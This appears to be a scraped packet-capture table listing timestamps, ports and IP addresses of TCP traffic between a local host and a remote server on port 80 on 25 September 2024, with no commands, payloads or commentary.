                                        Sep 25, 2024 18:40:28.983221054 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.983226061 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.983247042 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.983258963 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.983263016 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.983274937 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.983290911 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.983302116 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.983309984 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.983320951 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.983330965 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.983340025 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.983342886 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.983354092 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.983361959 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.983365059 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.983376980 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.983380079 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.983426094 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.983753920 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.983766079 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.983778954 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.983800888 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.983820915 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.983885050 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.983896017 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.983906984 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.983918905 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.983928919 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.983931065 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.983942032 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.983952999 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.983958960 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.983969927 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.983979940 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.984009981 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.984196901 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.984209061 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.984221935 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.984232903 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.984255075 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.984268904 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.984280109 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.984282017 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.984291077 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.984302044 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.984313965 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.984313965 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.984328985 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.984345913 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.984365940 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.196862936 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.197510958 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.197629929 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.201751947 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.201777935 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.201791048 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.201841116 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.201879978 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.201893091 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.201908112 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.201925993 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.201937914 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.201960087 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.202059031 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.202070951 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.202083111 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.202095032 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.202106953 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.202106953 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.202119112 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.202128887 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.202131987 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.202147007 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.202152014 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.202159882 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.202171087 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.202203035 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.202208042 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.202219963 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.202230930 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.202244043 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.202248096 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.202286959 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.202421904 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.202434063 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.202445984 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.202459097 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.202466011 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.202470064 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.202481985 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.202493906 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.202495098 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.202514887 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.202514887 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.202528000 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.202539921 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.202553034 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.202554941 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.202564001 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.202574968 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.202577114 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.202588081 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.202601910 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.202603102 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.202617884 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.202625990 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.202630043 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.202646017 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.202646971 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.202661037 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.202686071 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.202874899 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.202887058 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.202899933 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.202910900 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.202928066 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.202955961 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.203037977 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203048944 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203069925 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203078032 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.203082085 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203093052 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203104019 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.203104973 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203116894 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203129053 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203131914 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.203141928 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203154087 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203164101 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.203166008 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203177929 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203183889 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.203191042 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203202963 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.203203917 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203218937 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203233004 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.203259945 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.203291893 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203303099 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203315973 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203342915 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.203438044 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203449965 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203460932 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203473091 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203485012 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203486919 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.203496933 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203511953 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203517914 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.203524113 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203537941 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203550100 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203557968 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.203562975 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203586102 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.203594923 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203603983 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.203607082 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203619957 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203632116 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203644037 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.203650951 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203661919 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203672886 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.203674078 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203694105 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.203696966 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203707933 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203720093 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203732014 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203742981 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203743935 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.203754902 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203766108 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203777075 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.203784943 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203795910 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203798056 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.203807116 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203818083 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203830004 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203840971 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.203843117 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203857899 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203867912 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.203870058 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203883886 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203891039 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.203908920 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.204139948 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204152107 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204164982 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204178095 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204190016 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204191923 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.204222918 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.204284906 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204297066 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204308987 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204323053 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204335928 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204343081 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.204348087 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204359055 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204370022 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.204371929 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204385042 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204391956 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.204396963 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204408884 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204411030 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.204421997 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204442024 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204456091 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204463005 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.204468012 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204476118 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.204479933 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204492092 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204493046 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.204504013 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204515934 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204531908 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204541922 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.204544067 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204554081 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204562902 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.204566956 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204582930 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204585075 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.204593897 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204606056 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204619884 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204627037 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.204632044 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204646111 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204653978 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.204658031 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204669952 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204677105 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.204683065 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204694986 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204695940 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.204708099 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204720974 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204727888 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.204735041 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204746962 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204756975 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.204758883 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204777002 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.204792976 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.205136061 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205147982 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205162048 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205174923 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205187082 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205190897 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.205199957 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205210924 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205221891 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.205224991 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205245018 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.205260992 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.205324888 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205338001 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205351114 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205364943 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205372095 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.205380917 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205394030 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205403090 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.205406904 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205418110 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205425978 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.205430031 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205442905 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205444098 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.205452919 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205473900 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205487013 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205495119 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.205499887 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205507994 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.205514908 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205529928 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205542088 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.205543041 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205555916 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205569029 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205575943 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.205581903 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205595016 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205595016 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.205609083 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205620050 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205624104 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.205632925 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205645084 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205655098 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.205658913 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205671072 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205676079 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.205683947 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205694914 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.205697060 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205710888 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205723047 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205723047 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.205734015 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205746889 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205759048 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205769062 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.205769062 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.205771923 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205794096 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.206136942 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.206149101 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.206165075 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.206176996 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.206185102 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.206187963 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.206201077 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.206212997 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.206216097 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.206224918 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.206237078 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.206237078 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.206249952 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.206258059 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.206270933 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.206273079 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.206283092 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.206295967 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.206302881 CEST4971680192.168.2.6172.94.3.25
